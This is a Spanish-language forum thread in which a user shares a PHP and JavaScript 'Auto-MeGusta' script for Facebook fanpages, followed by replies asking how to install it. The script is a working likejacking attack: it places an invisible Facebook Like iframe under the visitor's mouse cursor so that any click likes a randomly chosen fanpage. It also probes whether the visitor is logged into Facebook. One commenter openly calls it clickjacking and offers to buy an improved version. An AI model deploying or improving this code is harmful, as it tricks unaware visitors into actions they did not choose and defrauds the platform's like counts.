Script Auto-MeGusta para Fanpages de Facebook

• Autor Autor Gorcash
  • Fecha de inicio Fecha de inicio
Sí que sale correctamente. Si te fijas el cursor se vuelve una mano.

No me vas ha creer, pero yo no veo nada, con mi sesion inciada y cerrando sesion, ya probé con internet explorer y chome, que tiene que salir?...un cuadradito que diga me gusta?.......
pero bueno siempre se agradece por haber compartido algo con nosotros:s

lo he puesto para probar en mi blog principal, pero no veo que salga nada, esta en el header.php antes del </head> Mira
Oh sera porque estoy logueado con mi cuenta de mi fanspage,y es por eso que no me sale lo que debe salir?

Entré a ese sitio, y cuando cerré sección en facebook, actualicé la página y me salió un cuadro que decía: No logueado en Facebook (y con un botón de hacer clic en aceptar)..

PD: pero no se pone la mano.

Entré a ese sitio, y cuando cerré sección en facebook, actualicé la página y me salió un cuadro que decía: No logueado en Facebook (y con un botón de hacer clic en aceptar)..

PD: pero no se pone la mano.
Bueno, mejor lo saco - creo que volvió un poco lenta la web

Regalo este script porque está sin pulir, fue una idea que abandoné a medio hacer.

- Cuenta con posibilidad de filtrado por el idioma del navegador (por defecto Español, se pueden modificar, quitar y añadir distintos idiomas para cada tipo de fanpage).
- Detecta si está el usuario o no registrado en Facebook para mostrar o no el script.
- Rotación de fanpages aleatoria.

Insertar CODE, HTML o PHP:
<? $idioma = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); switch ($idioma){ case "es": ?>

<script type='text/javascript' src='http://code.jquery.com/jquery-1.7.2.min.js'></script>

<script type="text/javascript" src="https://www.facebook.com/people/Jens-Lübberstedt/1009310897" onload="set_test('facebook',1)" onerror="set_test('facebook',0)" async="async"></script>

<script type="text/javascript">function set_test(network, status){ if(status){ var iflag = 0; var icontainer = document.getElementById('megusta'); var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body; function mouseFollower(e){ if (window.event){ icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px'; icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px'; }else{icontainer.style.top = (e.pageY-5)+'px'; icontainer.style.left = (e.pageX-5)+'px'; }} document.onmousemove = function(e){ if (iflag == 0) {mouseFollower(e); }}}else{ alert("No logueado en Facebook "); }}</script>

<?php $TXT = "http://www.url.com/fanpages.txt"; ?>

<?php $megusta = file($TXT); $aleatorio = $megusta[array_rand($megusta)]; ?>

<div style='overflow: hidden; width: 10px; height: 12px; position: absolute; opacity: 0.0;' id='megusta'>

<iframe src='http://www.facebook.com/plugins/like.php?href=<?php echo $aleatorio; ?>' scrolling='no' frameborder='0' style='border:none; overflow:hidden; width:50px; height:23px;' allowTransparency='true'></iframe></div>

<? break; } ?>

Configuración:

Crea un archivo llamado fanpages.txt con una URL de fanpage/web por linea. Súbelo a tu hosting y configura la variable $TXT del script. Esto hará que las URL vayan rotando aleatoriamente.

como lo modifica para que tenga mi pagina??

Esa era la intención, seguir y mejorarlo hasta ese punto. De forma que incluso rotara las fanpages click tras click, en AJAX o jQuery. Si me decido por seguir desarrollando o alguien se anima a continuarlo, lo iremos viendo en éste tema. Yo de momento no tengo demasiado tiempo, el poco que tengo me lo paso aquí posteando...

Deberias terminarlo y ponerle la funcion de que si ya le dieron Like no vuelva a aparecer.
Yo ando buscando algo asi.. Un tipo de "Clickjack" para Like de Facebook y no he encontrado nada que sirva aún,
Si lo haces y funciona yo lo compraría.

Es muy interesante este script! Alguien pudo hacerlo andar sin problemas? Desde ya graciaas! 🙂

Sí que sale correctamente. Si te fijas el cursor se vuelve una mano.

Hola, disculpa mi ignorancia pero como agrego esto en blogger?.

te agradeceria mucho

Y te preguntas porqué las páginas de fans han bajado su valor un 25%
Excelente script, yo lo usaré 😀

pero hay alguna forma de usarlo en blogger?

Bueno ya se que no sirve ni en blogger ni en tumblr sólo en plataformas que acepten php 😕

yo siempre que lo he probado, ni la mitad de likes recibo, no se porque pero a mi no me ha funcionado muy bien nunca. Además esto no lo detecta facebook y puedan cerrar las pages?

Gracias por el aporte.

Gracias por compartir 😀

Atrás